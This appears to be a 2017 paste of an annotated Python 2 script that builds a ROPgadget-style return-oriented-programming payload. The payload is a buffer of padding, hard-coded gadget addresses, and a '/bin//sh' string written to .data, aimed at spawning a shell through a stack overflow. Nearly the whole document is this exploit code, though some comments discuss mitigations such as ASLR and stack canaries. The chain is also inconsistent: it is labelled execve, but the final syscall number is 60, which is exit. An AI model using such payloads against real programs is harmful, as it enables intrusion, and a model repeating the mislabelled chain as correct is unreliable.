
Untitled

a guest
Jun 27th, 2017
  #!/usr/bin/env python2
  # execve generated by ROPgadget
  #
  # Annotated listing of a 64-bit return-oriented-programming (ROP) payload.
  # The script only builds a byte string and prints it to stdout; nothing in
  # it talks to a process or a network.
  #
  # What the payload depends on, useful when judging exposure:
  #   * Every address below is an absolute constant (0x4xxxxx for gadgets,
  #     0x6c0000 for .data), so the chain lines up only when the target image
  #     is mapped at exactly these addresses. A position-independent build
  #     loaded under ASLR moves them.
  #   * The filler presumably runs from an overflowed buffer up to a saved
  #     return address (the listing does not show the target); a stack
  #     protector canary sits in that gap.
  #   * Every step is chained through `ret`; a shadow stack checks each of
  #     those returns.

  from struct import pack

  # Gadget and data addresses exactly as annotated by ROPgadget in the paste.
  POP_RAX = 0x000000000044d2b4           # pop rax ; ret
  POP_RSI = 0x00000000004017e7           # pop rsi ; ret
  POP_RDI = 0x00000000004016d3           # pop rdi ; ret
  POP_RDX = 0x0000000000437205           # pop rdx ; ret
  XOR_RAX = 0x000000000041bd9f           # xor rax, rax ; ret
  INC_RAX = 0x000000000045aa10           # add rax, 1 ; ret
  STORE_RAX_AT_RSI = 0x0000000000467b51  # mov qword ptr [rsi], rax ; ret
  SYSCALL = 0x0000000000400488           # syscall
  DATA = 0x00000000006c0000              # @ .data


  def qword(value):
      """Encode value as an 8-byte little-endian unsigned integer."""
      return pack('<Q', value)


  # Filler placed in front of the chain (the paste labels it "Padding goes
  # here"); its length is specific to the binary the author analysed.
  padding = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

  # Stage 1: pop values into rax, rsi, rdi and rdx, clear rax, then syscall.
  # rax is zero when the syscall gadget runs: the xor gadget overwrites the
  # 113 popped at the start of the stage.
  stage_one = [
      qword(POP_RAX), qword(113),
      qword(POP_RSI), qword(1234),
      qword(POP_RDI), qword(1234),
      qword(POP_RDX), qword(1234),
      qword(XOR_RAX),
      qword(SYSCALL),
  ]

  # Stage 2: store the 8-byte string at .data and a zero qword at .data + 8,
  # then point rdi at .data and both rsi and rdx at .data + 8.
  stage_two = [
      qword(XOR_RAX),
      qword(POP_RSI), qword(DATA),
      qword(POP_RAX), '/bin//sh',      # raw 8 bytes, popped into rax
      qword(STORE_RAX_AT_RSI),
      qword(POP_RSI), qword(DATA + 8),
      qword(XOR_RAX),
      qword(STORE_RAX_AT_RSI),         # writes the zero qword
      qword(POP_RDI), qword(DATA),
      qword(POP_RSI), qword(DATA + 8),
      qword(POP_RDX), qword(DATA + 8),
  ]

  # Stage 3: zero rax, raise it one step at a time, then syscall. The paste
  # repeats the increment gadget 60 times, so rax holds 60 at the syscall.
  # The header names execve; when analysing a capture, check the number
  # against the target's syscall table rather than trusting that label.
  stage_three = [qword(XOR_RAX)] + [qword(INC_RAX)] * 60 + [qword(SYSCALL)]

  p = padding + ''.join(stage_one + stage_two + stage_three)

  # `print` appends a newline after the payload bytes.
  print p